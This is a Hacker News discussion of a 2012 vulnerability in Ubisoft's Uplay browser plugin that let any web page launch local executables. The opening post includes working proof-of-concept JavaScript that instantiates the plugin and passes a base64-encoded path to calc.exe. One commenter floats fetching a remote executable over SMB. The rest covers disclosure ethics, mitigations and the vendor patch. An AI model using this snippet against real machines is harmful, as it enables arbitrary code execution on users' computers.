
Ubisoft "Uplay" DRM exposed as rootkit - rightclick
If you play one of the games below try clicking on this link (tested with Assassin's Creed on Win7 and Firefox).

http://pastehtml.com/view/c6gxl1a79.html

    // Instantiate the Uplay browser plugin by its MIME type and call its
    // open() method with a launch command. The -orbit_exe_path argument is
    // base64 for C:\WINDOWS\SYSTEM32\CALC.EXE, so the plugin launches calc.exe.
    var x = document.createElement('OBJECT');
    x.setAttribute("type", "application/x-uplaypc");
    document.body.appendChild(x);
    x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play");

Ubisoft installs a backdoor that allows any website to take over your computer. The Sony BMG rootkit was also DRM and required product recall when it was discovered.

http://en.wikipedia.org/wiki/Ubisoft#Games

    Assassin's Creed II
    Assassin's Creed: Brotherhood
    Assassin's Creed: Project Legacy
    Assassin's Creed Revelations
    Assassin's Creed III
    Beowulf: The Game
    Brothers in Arms: Furious 4
    Call of Juarez: The Cartel
    Driver: San Francisco
    Heroes of Might and Magic VI
    Just Dance 3
    Prince of Persia: The Forgotten Sands
    Pure Football
    R.U.S.E.
    Shaun White Skateboarding
    Silent Hunter 5: Battle of the Atlantic
    The Settlers 7: Paths to a Kingdom
    Tom Clancy's H.A.W.X. 2
    Tom Clancy's Ghost Recon: Future Soldier
    Tom Clancy's Splinter Cell: Conviction
    Your Shape: Fitness Evolved
======
Foy
Oh hell no. I can't believe this shit... and Tom Clancy's Ghost Recon: Future
Soldier was such a good game too. T_T

Next time I want to play an Ubisoft game I'm just going to pirate it.

EDIT: I buy 99% of my video games through Steam, and when the games I get
through Steam want to use their own launcher (play, windows live games, or
EA's Origin, for example) I always get peeved.. to find out it allows
arbitrary remote code execution is absolutely infuriating.

EDIT: Oh, btw, I'm using Opera 12.

EDIT: Protect yourself (in Opera, at least) by going to Settings ->
Preferences(menu option) -> Advanced(Tab) -> Downloads(left menu bar) ->
Search for "uplay" and delete the associated row.

~~~
jiggy2011
I hate the hoop jumping in modern games. I was playing Street Fighter 4
recently and it comes up with "oh, you want to save your single player game?
You have to create a MicrosoftWindowsBingGamesPhone8ForXboxLive.Net account" .

Then of course you have to wait for the damn thing to sign in every time you
want to play the game "Connection failed, do you want to retry?"

~~~
Foy
Short of doing extensive background research on a title, Steam has no
indication of a game's dependence on some third party launcher or cloud
service, so every time I run a new game for the first time I have to clench
and pray the Windows Live overlay doesn't drop down.

Meaning: I feel your pain, brother.

~~~
wlesieutre
You sure about that? Section 8: Prejudice [1] (the only GFWL game I own) lists
Games for Windows Live under 3rd party DRM.

On the other hand, the Batman: Arkham Noun games [2,3] list SecuROM in 3rd
party DRM but not GFWL. I'm told that these games are both GFWL titles.

I don't know what's going on there, but it looks inconsistent.

[1] <http://store.steampowered.com/app/97100/>

[2] <http://store.steampowered.com/app/35140/>

[3] <http://store.steampowered.com/app/57400/>

~~~
jiggy2011
Batman: Arkham Asylum requires a Windows Live account, not sure about the new
one.

Perhaps it is not listed if it is only used to enable "social gaming" but DRM
is done by some other software.

~~~
wlesieutre
Just spotted it, the Batman games hide it in the System requirements:

> Online play requires log-in to Games For Windows – Live

So I guess it's in the DRM list if you need it to play singleplayer, and in
system reqs if you don't. Seems fair, but I'd still rather have it be
consistent. No reason S8 couldn't list it in both spots.

~~~
Foy
Still, I habitually don't read System Reqs. I'd expect something more like one
of the "Single Player", "Multi Player" bullets under the ESRB rating.
"Requires 3rd party bullshit"

~~~
wlesieutre
Agreed. There's no game that my desktop doesn't meet the minimum requirements
for, and won't be for at least a few years. I don't make a habit of checking
them.

------
pilif
I wouldn't say that this is a rootkit (there's no kernel-based magic or even
just privilege elevation going on), nor that this was done with bad
intentions.

This is just inexperienced developers («it's "encrypted" using base64 - we're
fine!!») that had a "great idea" (= launch games from an embedded IE control)
that has, kinda, backfired.

The sad thing is that it would be _trivial_ (I'm using the word "trivial" here
as I have implemented something like this just last Friday in 3 hours) to add
a signature to that command line and only execute signed command lines - I
mean, these Games require an internet connection anyways, so there's nothing
stopping them from serving the launcher from somewhere in the web and have a
private key there to do the signing.

~~~
Zolomon
Just for your information; rootkits can exist in any of the rings[1]. However,
kernel-mode rootkits are most often harder to detect and get rid of. There
are several definitions of a rootkit, a common definition is "software
designed to hide the existence of certain processes or programs from normal
methods of detection and enable continued privileged access to a computer."[2]

[1] <http://en.wikipedia.org/wiki/Ring_(computer_security)>

[2] <http://en.wikipedia.org/wiki/Rootkit>

~~~
wlesieutre
It doesn't seem like they went to any particular lengths to hide it, just
nobody bothered to look very hard, and you wouldn't expect them to be
installing browser plugins. Sony's DRM system, on the other hand, was an
actual rootkit and went to a lot of effort to bury itself in the infected
system.

~~~
Natsu
Maybe people would prefer to call it a "backdoor" instead, but this is quite
disconcerting. I'm very glad I don't play any of those games.

------
kinetik
Original source: <http://seclists.org/fulldisclosure/2012/Jul/375>

~~~
ajasmin
One of these days I'll have to buy an IDA license. I keep seeing amazing uses
of that disassembler.

~~~
sometwo
You can begin with the freeware version.

------
kevingadd
Why does Tavis Ormandy (<http://seclists.org/fulldisclosure/2012/Jul/375>)
keep putting fully usable proof of concept exploits out for widely deployed
software without giving a vendor time to prepare a patch, or in this case,
even notifying them? Off the top of my head, I remember he did this for the
windows help center exploit and the java web start exploit. I can't understand
why you would do this. You could at least give the vendor a couple weeks, and
then if you're super worried, release the details as soon as an exploit is
found in the wild.

As-is, he just seems like a raging hacker who loves attention and doesn't care
if thousands of unsuspecting users get their credit card details stolen by
malware authors. I must be misunderstanding something, yeah?

~~~
Paul_S
Because the company wasn't acting in good faith? IMHO they put that there on
purpose and they deserve to be exposed as evil bastards that they are.

~~~
simias
Do you have any evidence they put that here on purpose or are you just
spreading rumors? It could as well be shoddy programming.

~~~
Paul_S
I don't subscribe to "never attribute to malice that which is adequately
explained by stupidity". I'm not citing sources - hence it's just my opinion.
Reminds me of google wifi slurping and hundreds of other cases where everyone
plays dumb and swears it was all a misunderstanding. It never is. Until you
get caught. And if not that it's a rogue trader, rogue reporter, rogue
programmer, rogue scapegoat.

~~~
jbrechtel
Since we have no additional evidence to select between the two options, do you
really think that malice is simpler than stupidity?

~~~
Paul_S
I'm not going to do any kind of full disclosure here (I know this is lame) but
I work in video games so I know what it looks like from the other side. We're
not all idiots here, we just do as we're told.

~~~
danudey
As a Vancouverite, I've seen enough layoffs to believe this entirely (you're
fungible and replaceable). Still, I don't think that Ubisoft intentionally
created a security issue, just that they didn't care about one that happened
and deadlines were coming.

------
fmavituna
Google chrome users: You can go to "about:plugins" and disable this and all
other things that might expose you to extra security risks such as "Microsoft
Office" (even "Native Client") or any other plugins that exposed in there by
3rd party without any confirmation.

------
vyrotek
I think they just fixed this. It opened Uplay and it instantly downloaded a
new update released today.

Version 2.0.4 - Monday July 30th 2012 - "Fix addressing browser plugin. Plugin
now only able to open Uplay application"

~~~
MichaelGG
I would love to see how they patched it. Seems folks like these might
implement a check like 'cmd.Contains("uplay.exe")' and let you do
"C:\whatever\uplay.exe\\..\\..\bad.exe".

------
simias
I'm not sure if that's what the OP implied, but I'm not sure this was done on
purpose. "Never attribute to malice that which is adequately explained by
stupidity". Ubisoft is well known for their aggressive anti-pirating practices
(cloud saves for instance), but that's just too idiotic.

Here's taviso's mail on seclists:
<http://seclists.org/fulldisclosure/2012/Jul/375>

I hope ubisoft reacts quickly.

~~~
aristidb
If they can't do a crippling DRM properly, then maybe they have no business
building one at all.

------
sargun
This is concerning. Does anyone have any links to comments by Ubisoft? Any
reason why they would need the ability to execute arbitrary code in a hidden
manner? From what I understand, we call these things Trojans...

------
cabirum
UBI is not alone doing this.

Battlefield 3 also installs its plugin ("ESN Launch Mozilla Plugin") in all
browsers on a pc. It's capable of running EA's Origin service, so does it
present the same threat?

~~~
drucken
Also, game publisher Nexon silently installs a browser plugin (Nexon Game
Controller) on many (all?) of its games, none of which AFAIK need a browser:

Vindictus/Mabinogi Heroes

Dragon Nest

Maplestory

Atlantica Online

Combat Arms

------
atrius
I have several of these games (SWS, PoP, Heroes MM VI) installed as well as
UPlay but do not have any file associations for the type listed. Nor is
"x-uplaypc" anywhere in the registry for the Windows shell.

I also have titles that use online login from Ubi such as ANNO 2070 installed.

I think the list of affected titles is far smaller than listed.

How and when is this association set? Has someone identified which application
in the installer performs it? Is it a particular UPlay version?

I don't doubt they are setting this up to allow them to run games from a
browser. EA does it with Origin, Valve does it with Steam, as well as numerous
other applications.

I don't doubt its existence but I think people are starting a wildfire without
enough facts. I can't even seem to research this because it's not on my
machine.

------
jeremysalwen
Confirmed that this works on Win7/Firefox/Prince of Persia.

------
mikeymeows
Wow, well I already knew ubisoft were fisting me, but two hands? cmon.

~~~
rmc
Oh please, I know you're being light hearted, and repeating common cultural
memes, but please keep the "receiving anal is submission" to yourself. It's
often used as an excuse to call gay men "not real men" or effeminate. People
(of all genders & sexualities) who like fisting are not evil either.

~~~
bbrtyth
And should we also stop saying we've gotten "fucked" for similar reasons?
Since you are the curator and sole arbiter of allowable phrases, I'd like to
get it all clear while I've got your ear.

~~~
rmc
_And should we also stop saying we've gotten "fucked" for similar reasons?_

Sorta. Tis roughly the similar overtones of 'people-who-take-it-are-bad' (i.e.
everyone who isn't a straight cis male), however it's not as graphic and not
as tied to the actual imagery of receptive sex as the previous example.

 _Since you are the curator and sole arbiter of allowable phrases_

What? No I'm not. Who said I was? Not me. Just because I call someone on
something doesn't mean I'm the sole arbiter of things. How many articles on
this site will lambaste some technology? Lots. Do we reply with "Shut up!
you're not the sole arbiter of programming languages"? No that's not what
happens here. One should talk about the merits of the complaint, rather than
try some little deflection tactic.

~~~
bbrtyth
What about usage of the word "use"? Surely that implies interacting with
another person only for sex and we should stop using it lest we offend.

I was not deflecting, that was my way of talking about the merits of the
complaint, to wit, what you object to might be a tiny subset of someone
else's objections, in which case who gets to decide? By telling that person
not to use that terminology, you are saying you get to decide.

I think we've also seen plenty of people who think they are the sole arbiter
of programming languages, and they get called out on it.

~~~
rmc
_What about usage of the word "use"? Surely that implies interacting with
another person only for sex_

No, the word "use" means lots of things. To give you an idea, lots of people
are OK with people saying "use" in polite, professional contexts, or day time
TV, but lots of people would not be OK with "fuck" or "fisting with two hands"
in professional contexts. There is a difference between them. If you cannot
tell the difference, people might get annoyed at you in many situations.

 _we should stop using it lest we offend_

It is a common retort from people who want to continue to say things that
marginalise some minorities to claim that "It's political correctness gone
mad!" or "you can't say anything anymore!". You've just done that, you're
trying to imply that I would have a problem with the word "use" to further
your strawman argument that "You can't say anything anymore lest you offend!".
No-one's suggesting that there's anything wrong with "use". But there is
something wrong with calling anyone who has anal sex bad, or anyone who might engage
in receptive sex (i.e. all non-straight-cis-males) bad.

~~~
bbrtyth
I'm not trying to imply you have a problem with the word "use", I am directly
implying that there is some boundary beyond which someone will be offended and
you will not be. At which point whose delicate sensibilities should we defer
to?

I, for one, take exception that your category of people who enjoy receptive
sex seems to be explicitly excluding straight males, such that you've used the
exact same "i.e." qualifier twice. It is well within the realm of possibility
that a straight male would ask his partner to stimulate his prostate during
sex, but you categorically reject that. Are you going to correct your mistake
and stop making generalizations? Maybe start using e.g. from now on?

My position is this; it is obvious that the original poster is not making some
kind of blanket statement that all people who participate in anal sex are bad,
but rather is stating that having a large object in your anus is uncomfortable
and having an entity do it to you while you are unwilling is horrible. It's
not a statement that was attempting to marginalize minority groups. _You_ are
the one who misconstrued it to mean all gay men are evil. Maybe that's why you
find people's objections to your attempted control over the English language
to be common.

Finally, you seem to be annoyed that I "created a strawman argument" out of
you, but you do feel free to contort my statements into "it's political
correctness gone mad!", and "you can't say anything anymore!" as well as
directly stating that I am someone who "wants to continue to say things that
marginalize some minorities". Is ad hominem less of a logical fallacy than
making a so-called strawman argument? I'm not going to continue arguing with
someone that has such intellectual dishonesty because it's just a waste of
time. I am done here and I won't be reading any responses you post, so you can
save yourself some time there.

------
res0nat0r
If this was something released by Valve would it be described as a 'rootkit',
or more of a dumb mistake? The internet loves Steam and anything and
everything by Valve and hates Ubisoft.

~~~
slurgfest
By all means, bring out the inept rootkit installed by Steam which creates any
remotely comparable vulnerability in as many PCs.

------
ajasmin
So does this have some legitimate use on the web (such as product activation
on the Ubisoft website) or is this an ActiveX component intended to be used
locally that could have been marked as "safe for scripting" by mistake?

Edit: Other comments suggest there's a NPAPI plugin as well so it's definitely
intended for use on the web.

Also in what sense is this a rootkit? Is this purposely hidden from the list
of IE addons or something?

------
bbrtyth
Because of people like this (the straw was Growl installing itself for the
third time), I've had to completely change the permissions on particularly
vulnerable folders in OS X. Anyone creating software, if you are not already
aware of this: installing anything that is not completely and clearly
explained beforehand makes you a despicable wretch.

~~~
caiusdurling
FWIW growl doesn't install itself, applications that use it are _supposed_ to
offer to install growl for you, but there's been a few that don't and just
force it on you.

The growl devs really really hate those applications -
<http://growl.info/thirdpartyinstallations.php> has more info.

~~~
bbrtyth
The third party applications are using the Growl framework, yes? Did they
write the extra code to install Growl? If so, I am sorry. If, as I suspect,
they did not, why does the Growl framework not ask the user when that method
is invoked?

------
fmavituna
Even though the original vulnerability was quite lame and violated the first
rule of writing an ActiveX plugin (site-locking and making it only available
over HTTPS otherwise it's still vulnerable to code execution via MITM).

It's impressive that they already updated Uplay to address this problem (not
sure whether the fix is actually working or not though).
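
The site-locking fmavituna describes, as an added example that is not part of this thread or of the Uplay plugin: the decision an embedded plugin should make from the URL of the page that instantiated it, before it exposes any scriptable method. The allow-listed host, the helper names (`naiveSiteLock`, `siteLockAllows`) and the sample URLs are constructed for the demonstration.

```javascript
// Added example (not the Uplay plugin's code): site-locking the plugin to the
// page that embeds it. ALLOWED_HOSTS and the sample URLs are constructed.

// Hosts allowed to script the plugin; subdomains of an entry are accepted.
const ALLOWED_HOSTS = ['uplay.ubi.com'];   // hypothetical allow list

// The check a rushed developer might write: substring test on the whole URL.
function naiveSiteLock(pageUrl) {
  return pageUrl.includes('ubi.com');
}

// Parse the URL, require https (a plain-http embedding page can be rewritten
// by a man in the middle, so the lock is only as strong as the transport),
// then match the hostname exactly or as a subdomain of an allowed host.
// Going through the URL parser also defeats userinfo and query-string look-alikes.
function siteLockAllows(pageUrl, allowedHosts = ALLOWED_HOSTS) {
  let u;
  try { u = new URL(pageUrl); } catch (e) { return false; }
  if (u.protocol !== 'https:') return false;
  const host = u.hostname.toLowerCase();
  return allowedHosts.some((h) => host === h || host.endsWith('.' + h));
}

// Constructed page URLs: one legitimate, one subdomain, and the usual ways an
// attacker's page tries to look like the publisher's.
function demo() {
  const cases = {
    legit:       'https://uplay.ubi.com/launch?product=1',
    subdomain:   'https://static.uplay.ubi.com/embed',
    plainHttp:   'http://uplay.ubi.com/launch',
    suffixTrick: 'https://uplay.ubi.com.evil.example/',
    userinfo:    'https://uplay.ubi.com@evil.example/',
    inQuery:     'https://evil.example/?ref=uplay.ubi.com',
  };
  const result = {};
  for (const [name, url] of Object.entries(cases)) {
    result[name] = { naive: naiveSiteLock(url), hardened: siteLockAllows(url) };
  }
  return result;
}
```

The substring test passes every one of the six URLs; the parsed check passes only the two served from the allowed host over https. The plain-http case is the MITM point made above: the host is right, but the page content that called `open()` could have come from anyone on the path.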

------
Executor32
Doesn't work for me in either IE or Chrome, and I have AssCreed II, AssBro,
AssRev, and Forgotten Sands all installed. There is also no uPlay plugin to be
found in either browser. I suspect this only applies to certain versions of
uPlay; whether newer or older than the version I have installed, I have no
idea.

------
Aissen
Any mitigation ? Is it possible to disable this browser plugin ?

~~~
obtu
Google and Mozilla will certainly add it to their plugin blacklists. Trojan
capabilities remote-controlled through a browser, that's a very serious
security risk to their users.

~~~
kevingadd
A bug is filed to blacklist it in Firefox:
<https://bugzilla.mozilla.org/show_bug.cgi?id=778686>

------
e_p
This is a simple, obvious and extremely dangerous error, that anyone with
experience or appropriate education would have avoided.

There's an evident frivolous attitude towards technical quality control
present here, and everyone should avoid installing games requiring uPlay for
the time being.

------
ferongr
How does it work on Firefox? Does Ubisoft install an NPAPI plugin for
browsers without ActiveX?

------
ac-x
Ok, looks like the game can execute an existing exe file already on the
machine, is there currently any proof of concept for actually downloading and
executing arbitrary code? Or even specifying commandline arguments for the exe
file?

------
rogerbraun
This does not 'install a backdoor that allows any website to take over your
computer', right? It just makes it possible to launch any previously installed
executable if you know the path.

~~~
aw3c2
If someone can launch any executables on your machine, you can consider it to
be fairly dangerous.

~~~
rogerbraun
I know, but that's not what the submissions says. It feels a bit
sensationalized.

------
paddington
I'm curious, could it be possible to implement a simple SMB listener in
javascript and then send "\\<my-ip-address>\my_virus.exe" (encoded in
base64) as orbit_exe_path?

~~~
rix0r
You'd have to implement a TCP server listening on a privileged port (< 1024).
Surely no browser would allow this.

~~~
simias
I'm not sure about windows, but on all the un*xes I know you need to be root
(or have the right capabilities) to create a port with number < 1024. So even
if the browser doesn't enforce this, the OS should.

------
alexanderpas
Add Anno 2070 to the list

~~~
vacri
I've played Anno 2070. It's been removed from my list.

------
duked
How is this a rootkit when the user installed it and got notified of a browser
plugin being installed? Strange behavior yes but no rootkit!

------
Macha
<http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fix>

Apparently they've patched this now, according to their twitter.

------
Lockyy
I have uplay installed on my games pc along with all available AC games.
Neither chrome nor firefox have this plugin installed. Auto-removed after
being blacklisted? Or never installed?

------
andy_herbert
It might give an extra layer of protection if a browser actually bothered to
ask the user if they wanted to enable the plugin if they didn't explicitly ask
to install it themselves.

------
mansoor-s
Couldn't get it to work with R.U.S.E win7 Firefox/Chrome/IE

------
blitzcraig
Is this a Windows only exploit? I have RUSE installed via Steam on a Macbook
Pro and the linked page reports a missing plugin in Chrome, Safari, and
Firefox.

------
charonn0
Not owning any Ubisoft titles and not really interested in opening up IE, can
someone explain what it is that Ubisoft/IE users are seeing?

------
pjmlp
That is why I stopped buying DRM enabled games.

It is better to live without having played these games, than to expose myself
to such security risks.

------
RwYeAsNt
I don't get it. What does the link do? It opens Uplay for me and starts an
update. What does that mean?

------
cbsmith
Just because it is a security hole, doesn't make it a root kit. This is just a
dumb security hole.

------
fjawodfc
"Ubisoft Uplay DRM exposed as rootkit; dozens of popular games hacked"?
Idiots.

------
elmindreda
Thank you for expanding the list of games I should never buy.

------
freddealmeida
Stunning.

------
pluc
This was fixed this morning. No need to go ballistic over it. It's not a
rootkit.

------
89a
So much for the "Master Race"

